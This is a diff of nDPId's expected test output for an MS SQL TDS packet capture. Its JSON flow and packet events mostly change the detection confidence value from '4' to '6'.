-00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762477536,"flow_last_seen":1259762477536,"flow_idle_time":7580000,"flow_min_l4_payload_len":371,"flow_max_l4_payload_len":371,"flow_tot_l4_payload_len":371,"flow_avg_l4_payload_len":371,"midstream":1,"thread_ts_msec":1259762477536,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":7777,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} +00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762477536,"flow_last_seen":1259762477536,"flow_idle_time":7580000,"flow_min_l4_payload_len":371,"flow_max_l4_payload_len":371,"flow_tot_l4_payload_len":371,"flow_avg_l4_payload_len":371,"midstream":1,"thread_ts_msec":1259762477536,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":7777,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":34,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762482456,"flow_last_seen":1259762482456,"flow_idle_time":7580000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":88,"midstream":1,"thread_ts_msec":1259762482456,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":8888,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00580{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1259762482456,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":142,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":142,"pkt_l4_len":108,"thread_ts_msec":1259762482456,"pkt":"ABI\/\/61OABI\/\/6gdCABFAACA6VZAAIAGjUIKb29vCgAAASK4BZmoWq7z77DJrlAY\/kP\/5gAAAwkAWAAAAQAWAAAAEgAAAAIAAAAAAAAAAAABAAAAGwBwAF8ARwBlAHQATQB5AEUAeABhAG0AcABsAGUAVABhAGIAbABlAFIAbwB3AEMAbwB1AG4AdAAAAA=="} -00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762482456,"flow_last_seen":1259762482456,"flow_idle_time":7580000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":88,"midstream":1,"thread_ts_msec":1259762482456,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":8888,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762482456,"flow_last_seen":1259762482456,"flow_idle_time":7580000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":88,"midstream":1,"thread_ts_msec":1259762482456,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":8888,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} 00557{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":35,"source":"mssql_tds.pcap","alias":"nDPId-test","packets-captured":35,"packets-processed":34,"total-skipped-flows":0,"total-l4-payload-len":13137,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":7,"total-detection-updates":0,"total-updates":0,"current-active-flows":7,"total-active-flows":8,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":35,"global_ts_msec":1278068444584} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":35,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278068444584,"flow_last_seen":1278068444584,"flow_idle_time":7580000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":218,"midstream":1,"thread_ts_msec":1278068444584,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":9999,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00748{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1278068444584,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":272,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":272,"pkt_l4_len":238,"thread_ts_msec":1278068444584,"pkt":"ADAFzckRADAFzck9CABFAAECT7tAAIAGJlwKb29vCgAAAScPBZlFt6JP51MRDlAY+rgBzgAAAwEA2gAAAQAkAHAAcgBvAGMAXwBHAGUAdABNAHkARQB4AGEAbQBwAGwAZQBUAGEAYgBsAGUAUwBhAG0AcABsAGUATQBlAHQAYQBEAGEAdABhAAAAAAAkEBAzIhEAVUR3ZoiZqrvM3e7\/AAAfAADnAAAJBAABMgAAAACnJAAJBAABMiQAQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVphYmNkZWZnaGlqAAAmBAQBAAAAAAAmCAgtAAAAAAAAAAAApQwADAABI0VniavN7\/7cupgAACYEBGwAAAA="} -00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":35,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278068444584,"flow_last_seen":1278068444584,"flow_idle_time":7580000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":218,"midstream":1,"thread_ts_msec":1278068444584,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":9999,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} +00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":35,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278068444584,"flow_last_seen":1278068444584,"flow_idle_time":7580000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":218,"midstream":1,"thread_ts_msec":1278068444584,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":9999,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":36,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278068444614,"flow_last_seen":1278068444614,"flow_idle_time":7580000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":199,"midstream":1,"thread_ts_msec":1278068444614,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":11111,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00727{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1278068444614,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":253,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":253,"pkt_l4_len":219,"thread_ts_msec":1278068444614,"pkt":"ADAFzckRADAFzck9CABFAADvT85AAIAGJlwKb29vCgAAAStnBZlFt6Pw51OjJ1AY\/N33oQAAAwkAxwAAAQAkAHAAcgBvAGMAXwBHAGUAdABNAHkARQB4AGEAbQBwAGwAZQBUAGEAYgBsAGUAUwBhAG0AcABsAGUATQBlAHQAYQBEAGEAdABhAAAAAAAkEBAAESIzRFVmd4iZqrvM3e7\/AAAfAADnCgAJBAABMgoAQgBvAGcAdQBzAAAAHwAAJgQEAQAAAAAAJggILQAAAAAAAAAAAKUcABwAASNFZ4mrze\/ty6mHZUMhASNFZ4mrze\/ty6mHZQAAJgQEEgAAAA=="} -00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":36,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278068444614,"flow_last_seen":1278068444614,"flow_idle_time":7580000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":199,"midstream":1,"thread_ts_msec":1278068444614,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":11111,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} +00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":36,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278068444614,"flow_last_seen":1278068444614,"flow_idle_time":7580000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":199,"midstream":1,"thread_ts_msec":1278068444614,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":11111,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":37,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278068444650,"flow_last_seen":1278068444650,"flow_idle_time":7580000,"flow_min_l4_payload_len":268,"flow_max_l4_payload_len":268,"flow_tot_l4_payload_len":268,"flow_avg_l4_payload_len":268,"midstream":1,"thread_ts_msec":1278068444650,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":22222,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00820{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1278068444650,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":322,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":322,"pkt_l4_len":288,"thread_ts_msec":1278068444650,"pkt":"ADAFzckRADAFzck9CABFAAE0T9pAAIAGJgsKb29vCgAAAVbOBZn+D2d0K1+fyFAY+5tcOQAAAwkBDAAAAQAXAHAAcgBvAGMAXwBGAGUAdABjAGgATQB5AEUAeABhAG0AcABsAGUARABhAHQAYQAAAAAAJBAQASNFZ4mrze8BI0VniavN7wAA5wAACQQAATIAAAAA5woACQQAATIKAEIATwBHAFUAUwAAAGgBAQAAAG8ICP7\/\/\/8AAAAAAAAmBAQAAAAAAAAmBAQAAAAAAAAmBAAAACQQAAAAaAEAAAAmAQEAAAClHAAcAAEjRWeJq83vASNFZ4mrze8BI0VniavN7wEjRWcAACYEAAAAJgEBAQAAJgQEAABQAAAAJggILQAAAAAAAAAAACYBAQEAAGgBAQAAAOcCAAkEAAEy\/\/8AASYBAA=="} -00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278068444650,"flow_last_seen":1278068444650,"flow_idle_time":7580000,"flow_min_l4_payload_len":268,"flow_max_l4_payload_len":268,"flow_tot_l4_payload_len":268,"flow_avg_l4_payload_len":268,"midstream":1,"thread_ts_msec":1278068444650,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":22222,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} +00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278068444650,"flow_last_seen":1278068444650,"flow_idle_time":7580000,"flow_min_l4_payload_len":268,"flow_max_l4_payload_len":268,"flow_tot_l4_payload_len":268,"flow_avg_l4_payload_len":268,"midstream":1,"thread_ts_msec":1278068444650,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":22222,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278068444666,"flow_last_seen":1278068444666,"flow_idle_time":7580000,"flow_min_l4_payload_len":320,"flow_max_l4_payload_len":320,"flow_tot_l4_payload_len":320,"flow_avg_l4_payload_len":320,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":33333,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00891{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1278068444666,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":374,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":374,"pkt_l4_len":340,"thread_ts_msec":1278068444666,"pkt":"ADAFzckRADAFzck9CABFAAFoT95AAIAGJdMKb29vCgAAAYI1BZl4aO73Gv+xN1AY\/dgFJQAAAwkBQAAAAQAWAAAAEgAAAAIAAAAAAAAAAAABAAAAHQBkAGIAbwAuAHAAcgBvAGMAXwBHAGUAdABNAHkAUwBhAG0AcABsAGUARABhAHQAYQBJAHQAZQBtAHMAAAANQABTAGEAbQBwAGwAZQBJAHQAZQBtAEkAZAAAJBAQZhrDThSiU0infucGD\/\/\/BwdAAEQAYQB0AGEASQBkAADnAgAJBBAAAP\/\/DUAARABhAHQAYQBJAHQAZQBtAFQAeQBwAGUAACQQEJtFubyog2RFsdPp4ZhHj04IQABUAGEAYgBsAGUASQBkAADnAgAJBBAAAP\/\/DUAATQBhAHgARgBlAHQAYwBoAFMAaQB6AGUAACYEBGQAAAASQABTAG8AbQBlAE8AdABoAGUAcgBTAGEAbQBwAGwAZQBJAGQAACYEBAAAAAA="} -00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278068444666,"flow_last_seen":1278068444666,"flow_idle_time":7580000,"flow_min_l4_payload_len":320,"flow_max_l4_payload_len":320,"flow_tot_l4_payload_len":320,"flow_avg_l4_payload_len":320,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":33333,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1278068444614,"flow_last_seen":1278068444614,"flow_idle_time":7580000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":199,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":11111,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1259762400022,"flow_last_seen":1259762400022,"flow_idle_time":7580000,"flow_min_l4_payload_len":185,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":185,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":3333,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1259762400716,"flow_last_seen":1259762407935,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":438,"flow_tot_l4_payload_len":2137,"flow_avg_l4_payload_len":125,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":5555,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1259762477536,"flow_last_seen":1259762477536,"flow_idle_time":7580000,"flow_min_l4_payload_len":371,"flow_max_l4_payload_len":371,"flow_tot_l4_payload_len":371,"flow_avg_l4_payload_len":371,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":7777,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1278068444650,"flow_last_seen":1278068444650,"flow_idle_time":7580000,"flow_min_l4_payload_len":268,"flow_max_l4_payload_len":268,"flow_tot_l4_payload_len":268,"flow_avg_l4_payload_len":268,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":22222,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1278068444584,"flow_last_seen":1278068444584,"flow_idle_time":7580000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":218,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":9999,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1259762400004,"flow_last_seen":1259762400004,"flow_idle_time":7580000,"flow_min_l4_payload_len":17,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":30,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":2222,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1259762400033,"flow_last_seen":1259762400033,"flow_idle_time":7580000,"flow_min_l4_payload_len":1082,"flow_max_l4_payload_len":1082,"flow_tot_l4_payload_len":1082,"flow_avg_l4_payload_len":1082,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":4444,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} +00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278068444666,"flow_last_seen":1278068444666,"flow_idle_time":7580000,"flow_min_l4_payload_len":320,"flow_max_l4_payload_len":320,"flow_tot_l4_payload_len":320,"flow_avg_l4_payload_len":320,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":33333,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1278068444614,"flow_last_seen":1278068444614,"flow_idle_time":7580000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":199,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":11111,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1259762400022,"flow_last_seen":1259762400022,"flow_idle_time":7580000,"flow_min_l4_payload_len":185,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":185,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":3333,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1259762400716,"flow_last_seen":1259762407935,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":438,"flow_tot_l4_payload_len":2137,"flow_avg_l4_payload_len":125,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":5555,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1259762477536,"flow_last_seen":1259762477536,"flow_idle_time":7580000,"flow_min_l4_payload_len":371,"flow_max_l4_payload_len":371,"flow_tot_l4_payload_len":371,"flow_avg_l4_payload_len":371,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":7777,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1278068444650,"flow_last_seen":1278068444650,"flow_idle_time":7580000,"flow_min_l4_payload_len":268,"flow_max_l4_payload_len":268,"flow_tot_l4_payload_len":268,"flow_avg_l4_payload_len":268,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":22222,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1278068444584,"flow_last_seen":1278068444584,"flow_idle_time":7580000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":218,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":9999,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1259762400004,"flow_last_seen":1259762400004,"flow_idle_time":7580000,"flow_min_l4_payload_len":17,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":30,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":2222,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1259762400033,"flow_last_seen":1259762400033,"flow_idle_time":7580000,"flow_min_l4_payload_len":1082,"flow_max_l4_payload_len":1082,"flow_tot_l4_payload_len":1082,"flow_avg_l4_payload_len":1082,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":4444,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} 